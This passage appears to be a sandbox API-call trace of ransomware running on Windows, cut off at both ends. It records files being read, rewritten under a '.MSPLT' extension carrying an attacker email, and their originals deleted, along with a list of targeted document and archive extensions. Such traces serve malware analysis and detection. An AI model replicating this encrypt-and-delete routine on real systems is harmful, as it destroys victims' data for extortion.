dwMilliseconds=0x64) returned 0x102 [0174.927] GetTickCount () returned 0x116c6c2 [0174.927] GetTickCount () returned 0x116c6c2 [0174.927] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0175.439] GetTickCount () returned 0x116c8c6 [0175.439] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0175.876] GetTickCount () returned 0x116ca7b [0175.876] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0176.401] GetTickCount () returned 0x116cc7f [0176.401] GetTickCount () returned 0x116cc7f [0176.401] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0176.816] GetTickCount () returned 0x116ce25 [0176.816] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0177.407] GetTickCount () returned 0x116d077 [0177.407] GetTickCount () returned 0x116d077 [0177.407] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0179.502] GetTickCount () returned 0x116d8a4 [0179.502] GetTickCount () returned 0x116d8a4 [0179.502] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0179.748] GetTickCount () returned 0x116d99e [0179.748] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0180.300] GetTickCount () returned 0x116dbc1 [0180.300] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0180.426] GetTickCount () returned 0x116dc3e [0180.426] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0180.552] GetTickCount () returned 0x116dcbb [0180.552] GetTickCount () returned 0x116dcbb [0180.552] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0180.667] GetTickCount () returned 0x116dd29 [0180.667] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0180.828] GetTickCount () returned 0x116ddd4 [0180.828] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0180.958] GetTickCount () returned 0x116de51 [0180.958] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0181.105] GetTickCount () returned 0x116dede [0181.105] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0181.221] GetTickCount () returned 0x116df5b [0181.221] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0181.361] GetTickCount () returned 0x116dfe8 [0181.361] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0182.276] GetTickCount () returned 0x116e372 [0182.276] GetTickCount () returned 0x116e372 [0182.276] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0183.044] GetTickCount () returned 0x116e67f [0183.044] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0183.806] GetTickCount () returned 0x116e97d [0183.806] GetTickCount () returned 0x116e97d [0183.806] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0184.304] GetTickCount () returned 0x116eb71 [0184.304] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0185.301] GetTickCount () returned 0x116ef49 [0185.301] GetTickCount () returned 0x116ef49 [0185.301] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0185.794] GetTickCount () returned 0x116f13d [0185.794] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0186.504] GetTickCount () returned 0x116f3fc [0186.504] GetTickCount () returned 0x116f3fc [0186.504] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0186.746] GetTickCount () returned 0x116f4f6 [0186.747] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0186.879] GetTickCount () returned 0x116f573 [0186.879] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) returned 0x102 [0187.025] GetTickCount () returned 0x116f610 [0187.025] WaitForSingleObject (hHandle=0x288, dwMilliseconds=0x64) Thread: id = 8 os_tid = 0x1318 [0164.834] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3201218 [0164.835] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3211220 [0164.836] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad98 [0164.836] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d0f0 [0164.836] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76aea0 [0164.836] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x3927020 [0164.839] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ad50 [0164.839] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ad50, Size=0x20) returned 0x74e8e0 [0164.839] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af30 [0164.839] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af30, Size=0x20) returned 0x74e9a8 [0164.839] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0164.839] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0164.839] Wow64DisableWow64FsRedirection (in: OldValue=0x25eff50 | out: OldValue=0x25eff50*=0x0) returned 1 [0164.839] lstrlenW (lpString="kernel32.dll") returned 12 [0164.839] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e8e0 | out: hHeap=0x710000) returned 1 [0164.839] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0164.839] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e9a8 | out: hHeap=0x710000) returned 1 [0164.839] Sleep (dwMilliseconds=0x64) [0166.882] lstrcmpiW (lpString1=".log", lpString2=".MSPLT") returned -1 [0166.882] lstrlenW (lpString="downlevel_2017_09_07_02_02_39_766.log") returned 37 [0166.882] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0166.885] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=42674) returned 1 [0166.885] CloseHandle (hObject=0x2c8) returned 1 [0166.885] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 0x20 [0166.885] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0166.885] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0166.885] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0166.885] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0166.886] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0166.886] GetLastError () returned 0x0 [0166.886] ReadFile (in: hFile=0x2c8, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xa6b2, lpOverlapped=0x0) returned 1 [0166.904] WriteFile (in: hFile=0x2cc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xa6c0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xa6c0, lpOverlapped=0x0) returned 1 [0166.906] ReadFile (in: hFile=0x2c8, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0166.906] WriteFile (in: hFile=0x2cc, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x11e, lpOverlapped=0x0) returned 1 [0166.907] SetEndOfFile (hFile=0x2cc) returned 1 [0166.907] CloseHandle (hObject=0x2cc) returned 1 [0166.912] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0166.912] SetEndOfFile (hFile=0x2c8) returned 1 [0166.914] CloseHandle (hObject=0x2c8) returned 1 [0166.914] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0166.914] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log" (normalized: "c:\\$getcurrent\\logs\\downlevel_2017_09_07_02_02_39_766.log")) returned 1 [0167.229] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.229] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.229] lstrlenW (lpString=".doc") returned 4 [0167.229] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0167.229] lstrlenW (lpString=".docx") returned 5 [0167.229] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0167.229] lstrlenW (lpString=".pdf") returned 4 [0167.229] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0167.229] lstrlenW (lpString=".xls") returned 4 [0167.229] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0167.229] lstrlenW (lpString=".xlsx") returned 5 [0167.229] lstrcmpiW (lpString1=".xlsx", lpString2="6.log") returned -1 [0167.229] lstrlenW (lpString=".ppt") returned 4 [0167.229] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0167.229] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.229] lstrlenW (lpString=".zip") returned 4 [0167.229] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0167.229] lstrlenW (lpString=".rar") returned 4 [0167.229] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0167.229] lstrlenW (lpString=".bz2") returned 4 [0167.229] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0167.229] lstrlenW (lpString=".7z") returned 3 [0167.229] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0167.229] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.229] lstrlenW (lpString=".dbf") returned 4 [0167.229] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0167.229] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.230] lstrlenW (lpString=".1cd") returned 4 [0167.230] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0167.230] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.230] lstrlenW (lpString=".jpg") returned 4 [0167.230] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0167.230] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.230] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.230] lstrlenW (lpString=".doc") returned 4 [0167.230] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0167.230] lstrlenW (lpString=".docx") returned 5 [0167.230] lstrcmpiW (lpString1=".docx", lpString2="6.log") returned -1 [0167.230] lstrlenW (lpString=".pdf") returned 4 [0167.230] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0167.230] lstrlenW (lpString=".xls") returned 4 [0167.230] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0167.230] lstrlenW (lpString=".xlsx") returned 5 [0167.230] lstrcmpiW (lpString1=".xlsx", lpString2="6.log") returned -1 [0167.230] lstrlenW (lpString=".ppt") returned 4 [0167.230] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0167.230] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.230] lstrlenW (lpString=".zip") returned 4 [0167.230] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0167.230] lstrlenW (lpString=".rar") returned 4 [0167.230] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0167.230] lstrlenW (lpString=".bz2") returned 4 [0167.230] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0167.231] lstrlenW (lpString=".7z") returned 3 [0167.231] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0167.251] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.251] lstrlenW (lpString=".dbf") returned 4 [0167.251] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0167.251] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.251] lstrlenW (lpString=".1cd") returned 4 [0167.251] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0167.251] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\downlevel_2017_09_07_02_02_39_766.log") returned 57 [0167.251] lstrlenW (lpString=".jpg") returned 4 [0167.251] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0167.251] Sleep (dwMilliseconds=0x64) [0167.654] Sleep (dwMilliseconds=0x64) [0168.853] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0168.853] lstrlenW (lpString="LocalizedData.xml") returned 17 [0168.853] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.854] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=80970) returned 1 [0168.854] CloseHandle (hObject=0x304) returned 1 [0168.854] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 0x80 [0168.854] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.854] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.854] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.855] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.855] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0168.855] GetLastError () returned 0x0 [0168.855] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x13c4a, lpOverlapped=0x0) returned 1 [0168.861] WriteFile (in: hFile=0x308, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13c50, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13c50, lpOverlapped=0x0) returned 1 [0168.864] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0168.864] WriteFile (in: hFile=0x308, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xf6, lpOverlapped=0x0) returned 1 [0168.864] SetEndOfFile (hFile=0x308) returned 1 [0168.865] CloseHandle (hObject=0x308) returned 1 [0168.867] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.867] SetEndOfFile (hFile=0x304) returned 1 [0168.869] CloseHandle (hObject=0x304) returned 1 [0168.869] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.869] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 1 [0168.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.869] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.869] lstrlenW (lpString=".doc") returned 4 [0168.869] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString=".docx") returned 5 [0168.870] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.870] lstrlenW (lpString=".pdf") returned 4 [0168.870] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString=".xls") returned 4 [0168.870] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString=".xlsx") returned 5 [0168.870] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.870] lstrlenW (lpString=".ppt") returned 4 [0168.870] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.870] lstrlenW (lpString=".zip") returned 4 [0168.870] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.870] lstrlenW (lpString=".rar") returned 4 [0168.870] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString=".bz2") returned 4 [0168.870] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString=".7z") returned 3 [0168.870] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.870] lstrlenW (lpString=".dbf") returned 4 [0168.870] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.870] lstrlenW (lpString=".1cd") returned 4 [0168.870] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.870] lstrlenW (lpString=".jpg") returned 4 [0168.870] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.870] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.870] lstrlenW (lpString=".doc") returned 4 [0168.870] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0168.870] lstrlenW (lpString=".docx") returned 5 [0168.870] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0168.871] lstrlenW (lpString=".pdf") returned 4 [0168.871] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0168.871] lstrlenW (lpString=".xls") returned 4 [0168.871] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0168.871] lstrlenW (lpString=".xlsx") returned 5 [0168.871] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0168.871] lstrlenW (lpString=".ppt") returned 4 [0168.871] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0168.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.871] lstrlenW (lpString=".zip") returned 4 [0168.871] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0168.871] lstrlenW (lpString=".rar") returned 4 [0168.871] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0168.871] lstrlenW (lpString=".bz2") returned 4 [0168.871] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0168.871] lstrlenW (lpString=".7z") returned 3 [0168.871] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0168.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.871] lstrlenW (lpString=".dbf") returned 4 [0168.871] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0168.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.871] lstrlenW (lpString=".1cd") returned 4 [0168.871] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0168.871] lstrlenW (lpString="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml") returned 44 [0168.871] lstrlenW (lpString=".jpg") returned 4 [0168.871] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0168.871] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0168.871] lstrlenW (lpString="eula.rtf") returned 8 [0168.872] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.872] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=3314) returned 1 [0168.872] CloseHandle (hObject=0x304) returned 1 [0168.872] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 0x80 [0168.872] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.872] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0168.872] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.872] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.872] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0168.874] GetLastError () returned 0x0 [0168.874] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0xcf2, lpOverlapped=0x0) returned 1 [0168.876] WriteFile (in: hFile=0x308, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xd00, lpOverlapped=0x0) returned 1 [0168.877] ReadFile (in: hFile=0x304, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0168.877] WriteFile (in: hFile=0x308, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0xe4, lpOverlapped=0x0) returned 1 [0168.878] SetEndOfFile (hFile=0x308) returned 1 [0168.878] CloseHandle (hObject=0x308) returned 1 [0168.880] SetFilePointerEx (in: hFile=0x304, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0168.880] SetEndOfFile (hFile=0x304) returned 1 [0168.881] CloseHandle (hObject=0x304) returned 1 [0168.881] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0168.881] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 1 [0168.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.882] lstrlenW (lpString=".doc") returned 4 [0168.882] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0168.882] lstrlenW (lpString=".docx") returned 5 [0168.882] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0168.882] lstrlenW (lpString=".pdf") returned 4 [0168.882] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0168.882] lstrlenW (lpString=".xls") returned 4 [0168.882] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0168.882] lstrlenW (lpString=".xlsx") returned 5 [0168.882] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0168.882] lstrlenW (lpString=".ppt") returned 4 [0168.882] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0168.882] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\eula.rtf") returned 35 [0168.882] lstrlenW 